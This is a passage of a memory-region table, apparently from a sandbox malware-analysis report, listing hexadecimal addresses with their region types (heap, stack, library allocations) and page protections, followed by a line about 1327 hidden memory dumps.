|
page read and write
|
||
|
1ED05912000
|
trusted library allocation
|
page read and write
|
||
|
156FAB6E000
|
heap
|
page read and write
|
||
|
20D166E9000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
DC0000
|
unkown
|
page readonly
|
||
|
931000
|
heap
|
page read and write
|
||
|
69BE000
|
stack
|
page read and write
|
||
|
6AD0000
|
direct allocation
|
page read and write
|
||
|
1ED05900000
|
trusted library allocation
|
page read and write
|
||
|
7190000
|
trusted library allocation
|
page read and write
|
||
|
9B0000
|
unkown
|
page readonly
|
||
|
2B44000
|
heap
|
page read and write
|
||
|
20D16240000
|
heap
|
page read and write
|
||
|
6B8D000
|
stack
|
page read and write
|
||
|
156FC470000
|
trusted library allocation
|
page read and write
|
||
|
6F4000
|
heap
|
page read and write
|
||
|
20D169D8000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
A95000
|
unkown
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2AA0000
|
trusted library allocation
|
page read and write
|
||
|
7C5E000
|
stack
|
page read and write
|
||
|
2AE8000
|
heap
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
71B0000
|
trusted library allocation
|
page read and write
|
||
|
20D165C9000
|
heap
|
page read and write
|
||
|
2BC4000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
75D3000
|
heap
|
page read and write
|
||
|
20D1681E000
|
heap
|
page read and write
|
||
|
EE0000
|
unkown
|
page read and write
|
||
|
508E000
|
stack
|
page read and write
|
||
|
31CD000
|
direct allocation
|
page execute and read and write
|
||
|
221DA3B000
|
stack
|
page read and write
|
||
|
156FAA80000
|
heap
|
page read and write
|
||
|
156FCD0B000
|
heap
|
page read and write
|
||
|
20D16691000
|
heap
|
page read and write
|
||
|
83F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2EC0000
|
unkown
|
page readonly
|
||
|
20D167AC000
|
heap
|
page read and write
|
||
|
20D16638000
|
heap
|
page read and write
|
||
|
20D165E2000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
20D16823000
|
heap
|
page read and write
|
||
|
43B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C82000
|
heap
|
page read and write
|
||
|
20D169E1000
|
heap
|
page read and write
|
||
|
20D167ED000
|
heap
|
page read and write
|
||
|
761D000
|
heap
|
page read and write
|
||
|
75D1000
|
heap
|
page read and write
|
||
|
12B0000
|
heap
|
page read and write
|
||
|
A80000
|
unkown
|
page readonly
|
||
|
A95000
|
unkown
|
page read and write
|
||
|
1090000
|
unkown
|
page readonly
|
||
|
1561000
|
unkown
|
page readonly
|
||
|
7FFD34876000
|
trusted library allocation
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D1673C000
|
heap
|
page read and write
|
||
|
2A89000
|
trusted library allocation
|
page read and write
|
||
|
20D1672E000
|
heap
|
page read and write
|
||
|
2A7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF45CA00000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D16939000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
65FB07F000
|
stack
|
page read and write
|
||
|
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
|
20D16723000
|
heap
|
page read and write
|
||
|
C10000
|
trusted library allocation
|
page read and write
|
||
|
20D1682B000
|
heap
|
page read and write
|
||
|
20D147C0000
|
heap
|
page read and write
|
||
|
20D16836000
|
heap
|
page read and write
|
||
|
25E655A0000
|
heap
|
page read and write
|
||
|
20D16813000
|
heap
|
page read and write
|
||
|
1FD81000
|
heap
|
page read and write
|
||
|
20D16721000
|
heap
|
page read and write
|
There are 1327 hidden memdumps, click here to show them.